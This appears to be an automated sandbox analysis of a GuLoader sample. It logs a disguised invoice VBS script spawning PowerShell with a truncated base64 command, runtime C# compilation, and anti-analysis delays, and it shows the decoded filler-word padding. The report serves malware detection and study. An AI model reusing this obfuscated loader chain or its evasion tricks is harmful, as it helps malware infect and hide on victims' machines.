    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES571F.tmp" "c:\Users\user\AppData\Local\Temp\xd0x2kfy\CSC444B4F613D554F189420B3812D9BACB.TMP"
    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6288:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1280:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_01
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220510Jump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeFile created: C:\Users\user\AppData\Local\Temp\tpled5lu.bpnJump to behavior
    Source: classification engineClassification label: mal84.troj.evad.winLZH@17/12@0/1
    Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
    Source: Binary string: Xl7C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.pdb source: powershell.exe, 00000016.00000002.518463762.000000000523E000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Yara detected GuLoader
    Source: Yara matchFile source: 00000016.00000002.523684015.00000000096D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.dllJump to dropped file
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2510
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2559
    Source: C:\Windows\SysWOW64\unarchiver.exe TID: 7016Thread sleep count: 131 > 30
    Source: C:\Windows\SysWOW64\unarchiver.exe TID: 7016Thread sleep time: -65500s >= -30000s
    Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6932Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6172Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6172Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.dllJump to dropped file
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\unarchiver.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 0_2_00A2B042 GetSystemInfo,
    Source: C:\Windows\SysWOW64\unarchiver.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: powershell.exe, 00000016.00000002.516850530.000000000500E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
    Source: powershell.exe, 00000016.00000002.516850530.000000000500E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Xl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Encrypted powershell cmdline option found
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Base64 decoded #Nandinme5 Bobleka Artikuler hotm Formnin4 Vigesimoki6 stom Echinit6 pronativ Pyro Texttv7 Elevatorfr RAMRODSA Qekursuss beanpo Skrk2 polari medeola Lora Raphi6 #defa pied Tandkdsbe Unimmor Badgerb6 exclus Chondrog8 AEROLO FISHERMANI FAGINTEGR Incepto3 Snurl6 Bisexua dosser gavel metafore tran atak Seismi2 Nonfabul Digtek3 REGNSKA Phytome9 Murae Halv8 VOCIFERATE WOODCRAFT hardheart Knib sejt #Immervk8 Sprogfl REDSHI siffleus Super rifters Grouch Proeveti PROTENSI Lydbillede SUBELECTR Rammetchor CISSESAR Bred jordfste Antisens LOXO #Splurgypy7 Septen Dims Tebrevsunc2 Stttep2 likvide Aftvi pantog vejbyg coco ISBRY PASS Pinf munikat unse GULDR Melodiou panimete Raftesoste avancement Enteasubpr MYCE Tidlnnede3 odyssen dryptrren perso #horn Centr4 Henrykkesl8 FORDAMPNIN Intrafol Caldron infr valg SISYRI Genoako skadegrer Underafsni2 Vaccinat drillerier CHAI #Detoxif afmali Hmmetn Alkoholtyp9 linie TAARN mero Spectro8 stjern Positio Autobio utakne Humanhoo3 ompl Bevisfrels3 Brillefode6 EJENDOMS Turistk4 chantant bondesta BILFRAGTER SIDHEPRE #Skident aanderfiau Tallwoo5 vinologist LOYALE Valeri4 lavin Baar9 forventel Nonconv #PERSONNAV idemp start choyainti loxict Hestebre1 Foelebal Mois Lallet Obelisk3 drikk Lanasr #bestraalin STRMPEH VEDL Myelo Dish Accept1 Unpl3 ARBEJDSLSH Anmeldelse SKOVHYTTE prsteskab Publicis8 Umindel4 #sportsma Dkningss4 Deposi1 regningsfu suspe Deba requir Saltstenm1 RDEPANGI #Selvmodsig SUBD kvksfinge Anom thailnde Ondu nonp WINDB
